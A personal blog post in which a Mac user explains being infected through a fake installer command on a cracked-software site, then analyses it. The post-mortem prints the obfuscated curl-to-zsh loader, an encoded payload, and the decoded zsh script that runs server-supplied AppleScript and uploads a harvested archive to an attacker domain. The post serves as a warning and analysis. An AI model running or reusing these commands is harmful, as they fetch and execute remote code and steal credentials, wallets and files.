If you have been following me on Instagram, or if you had my WhatsApp, you would have known that I have been hacked. After the incident a lot of people have asked me how it happened. I would like to express the incident publicly, so that you know how easy it is to get affected.
# What Happened?
On last Wednesday (08/04/2026), at night, I was looking for a cracked software for my Mac, on a famous site. It did have the software. I clicked “Free Download”. And a site opened. The domain name was “josvafiles.com” (I am not linking to it, because it has been taken down). The site had a nice UI, and had installation command. The installation command started with “GitHub-AppInstaller”. I believed it was a genuine installation command for the software I was looking for.
With no second thoughts, I ran the script on the terminal. And that was the stupidest decision I have made in a long time.
There was nothing. No additional windows. No prompts. Nothing. The script just ran and finished.
Then I went to the site again, clicked the download button again. And it showed me different download options. Even then I did not suspect anything.
# How did I find out?
It was about 1:30am, the next day. My friends on Instagram suddenly sent me a message. I wasn’t sleep. I went in and noticed that there was a scam message sent from my account, just minutes ago. The message was sent to literally everyone in my circle. Someone got in to my account.
I quickly reset my Instagram password. Went in to turn on 2FA, surprisingly it was already on. I posted a story saying that I was hacked. And started deleting the messages, one by one. Because I knew if the message is still there in the morning at least 50% of the people will fall for it. I deleted as much messages I could.
Then I noticed that the same message has already been put on my story and posted on my account. I deleted them. The attacker was spamming about the scam on random Instagram reels as well. Fortunately, one of my friends helped me delete those comments quickly.
After finding out the root cause (which I am explaining in the next section), I wiped my Mac for safety reasons. It took about 5 hours to wipe and setup everything again. There were no other options.
The next day, I received suspicious activity on my Google account and my Epic Games account. Hopefully, there was not much damage done on here. I quickly reset the passwords, signed out on all devices and made sure everything’s safe. I had 5 or 6 games in my Epic Games account, and that’s not a big deal for me.
# How do you stay safe
That’s the easiest part.
DO NOT USE CRACK SOFTWARE.
DO NOT RUN RANDOM COMMANDS FROM THE INTERNET WITHOUT CHECKING.
# Post Mortem
After everything, I went back to the command and started digging through.
echo "GitHub-AppInstaller: https://dl.github.com/drive-file-stream/GitHubApplicationSetup.dmg" && curl -kfsSL $(echo 'aHR0cDovL2J1cmVhaS5jb20vY3VybC9lZDhlOWVjNjZjNWRhZmFiZTk2YjRlYTgzOTFiMGZmZjUwMDA0YWRhMWE4ZDczOGIwODM4YTFhZGI1NTE3ODBk'|base64 -D)|zshDon’t be fooled by the “GitHub-AppInstaller”. It’s just an echo. The important part is what comes next.
If you are a cybersecurity nerd or a CTF player, you would immediately notice that there’s a base64-encoded string:
aHR0cDovL2J1cmVhaS5jb20vY3VybC9lZDhlOWVjNjZjNWRhZmFiZTk2YjRlYTgzOTFiMGZmZjUwMDA0YWRhMWE4ZDczOGIwODM4YTFhZGI1NTE3ODBkBy decoding it, we get:
http://bureai.com/curl/ed8e9ec66c5dafabe96b4ea8391b0fff50004ada1a8d738b0838a1adb551780dWhen we open this URL, a file with .daily extension will be downloaded. At this point, a antivirus software would flag it, as it’s the malware. It’s really a zsh script file. The downloaded file contains:
#!/bin/zsh
d2057=$(base64 -D <<'PAYLOAD_m128772990130254' | gunzip
H4sIAJBv12kAA91WW2/bNhR+9684VRXDasBIiiJbuahpsAVoUKQdkgYL1hUCLVI2YZnSRLpx0va/
j7JkiZINbC97GV9kHn78zv3Qr1/ZU8btFzEfEEyXGY+SFY8ly/jIgu8DUIuuaQwXNqHfbL5K01b2
do/suCdMsxinQLIlZjw0WPGNccq4pAXLCkIFm3FaHMXZ0tDQMltQBaYkoKc0Ho9jn+AET+npeHpC
ceCdulMnSRLfcZwTTLCLAzLxgqkTeIHakKnvu5PAITolzlm0oM+h4bunDk3ciee5gYcdEo+9ZDo+
9jx/kvhjMtYvJSyloWHLZW5nAqfZbMb47OiF5RWIJfAFzNeAZhIc+HoOck755qRc8apIAS0ACUBo
iddIsiUFz4E/G0i50HswHgQt0NWMcnkGt9kLS1Ns+0cOjG5xrGKVifk53KiYpaAE8OkeHsF1IteP
JhZc5XlKf6fTD0zavjc58sbGHg3KfaTcPwOzDkQfZMylzM9s26wyZZNnjpcsvpRrEpqbfAzzJ/XT
NeAHqGCIuGC5rNKeCvq/9XrX3YRpyb8ExOme5NM1k+D28V/gFaAEDLMsLMX8o9yLZv+1z1JQuSp4
l6eqzF/eP3z8EN3f/HEdmqOR68AbFZvjk/pjWRr09uoxurv+fHdzfR8GmnyVpxkmEVOejgiWFA4P
hIXMUZZTLkQKBeYE0JyuIdCburSaxvMMzLurj79+uq0/Vqd9JU4jwV6qsmi3SpOQWJYxOHhp3O6R
V4gYDprAWFoAUXmvZdwEsStA9K8yIf8+ltXleL7iC1FGE0YtHRxqoQYErgW2LulEmoXOZvc0V1aD
ImJw0WFX8HM1ChubqmtZkggqS81M5a8lr7lb4IakDmQLa0BKYUWljG6h8FZLgDIAhsMO0Uj3FtUM
O6rFKo6pELWDrRxLSZe5DN1G3jhfH8FFqJdgqb4mgzBUieqFpFxlU0ZxRkrrCFGJD7elMhWhC2LB
8tCsXY2zFVex0/ztlFOv38ulT6hH+O3h8x4MQqojMFIPIy6e4R3aB/nPJ9hWyz9OscriZti6QX/a
bgAZtHHZc/wExsH3JvI/9+noT8uZmhqX0xVLifZKaGOl+Tms0sM4oevQZMNux+m7zjSwOhaUeYvK
4bBSdy47R9VoMDVEPQVUsZmNT+qdVtXh7EhTqd6nPRNju7a173ZOOq/edo1GddUfHlrWLlFKaQ6q
4zzVodv2eAPHPWg9nMpFMt4qUV6qttppnh2bO5OuR6hmTGNaQ14stVdpoFE4g58DpbX3v1Ah3xkw
bBVvHjtn0ESkfvwS9je7pdBlXAoAAA==
PAYLOAD_m128772990130254
)
eval "$d2057"Another base64-encoded string. How wonderful!
When base64-decoding, it gave non-ascii output. That can’t be it. I piped the output into a file. Running file on it showed that it’s a gzip file. Unzipping the file gave a zsh script with the following content:
#!/bin/zsh
daemon_function() {
exec </dev/null
exec >/dev/null
exec 2>/dev/null
local domain="irvineinteriordesigner.com"
local token="ed8e9ec66c5dafabe96b4ea8391b0fff50004ada1a8d738b0838a1adb551780d"
local api_key="5190ef1733183a0dc63fb623357f56d6"
local file="/tmp/osalogging.zip"
if [ $# -gt 0 ]; then
curl -k -s --max-time 30 \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
-H "api-key: $api_key" \
"http://$domain/dynamic?txd=$token&pwd=$1" | osascript
else
curl -k -s --max-time 30 \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
-H "api-key: $api_key" \
"http://$domain/dynamic?txd=$token" | osascript
fi
if [ $? -ne 0 ]; then
exit 1
fi
if [[ ! -f "$file" || ! -s "$file" ]]; then
return 1
fi
local CHUNK_SIZE=$((10 * 1024 * 1024))
local MAX_RETRIES=8
local upload_id=$(date +%s)-$(openssl rand -hex 8 2>/dev/null || echo $RANDOM$RANDOM)
local total_size
total_size=$(stat -f %z "$file" 2>/dev/null || stat -c %s "$file")
if [[ -z "$total_size" || "$total_size" -eq 0 ]]; then
return 1
fi
local total_chunks=$(( (total_size + CHUNK_SIZE - 1) / CHUNK_SIZE ))
local i=0
while (( i < total_chunks )); do
local offset=$((i * CHUNK_SIZE))
local chunk_size=$CHUNK_SIZE
(( offset + chunk_size > total_size )) && chunk_size=$((total_size - offset))
local success=0
local attempt=1
while (( attempt <= MAX_RETRIES && success == 0 )); do
http_code=$(dd if="$file" bs=1 skip=$offset count=$chunk_size 2>/dev/null | \
curl -k -s -X PUT \
--data-binary @- \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
-H "api-key: $api_key" \
--max-time 180 \
-o /dev/null \
-w "%{http_code}" \
"http://$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks" 2>/dev/null)
curl_status=$?
if [[ $curl_status -eq 0 && $http_code -ge 200 && $http_code -lt 300 ]]; then
success=1
else
((attempt++))
sleep $((3 + attempt * 2))
fi
done
if (( success == 0 )); then
return 1
fi
((i++))
done
rm -f "$file"
return 0
}
if daemon_function "$@" & then
exit 0
else
exit 1
fiThe script contacts a server. The server returns AppleScript code. And this script runs it. If you are curious, you can view the AppleScript code the server returned. I am not including the AppleScript code here, as it’s very long.
The AppleScript code does:
- Gain/validate user credentials
- Dumps system and process info
- Steal browser data (cookies, logins, sessions, high-profile extensions)
- Target crypto wallets (browser + desktop)
- Harvests keychains
- Harvests all files (Documents, Desktop, Downloads)
- Harvests Telegram session data
- Harvests SSH keys, AWS configurations, Kubernetes configurations
- Harvests Notes database
- Harvests dotfiles
- Backdoors Ledger apps
Once the above script finishes running, all the harvested information is stored in /tmp/osalogging.zip. The zsh script above, chunks the zip file into 10MB packets, and sends it back to the attacker’s server.
In my case, about 15GB of data and files have been stolen.
This is the MacSync malware. It runs on userland, relies on deliberate user execution and does not spread through the internet itself.
Lot of my personal stuff has been stolen. My Instagram and Google accounts were compromised (who knows what else got compromised). All because I was not careful. To be honest, this situation was very embaressing to me.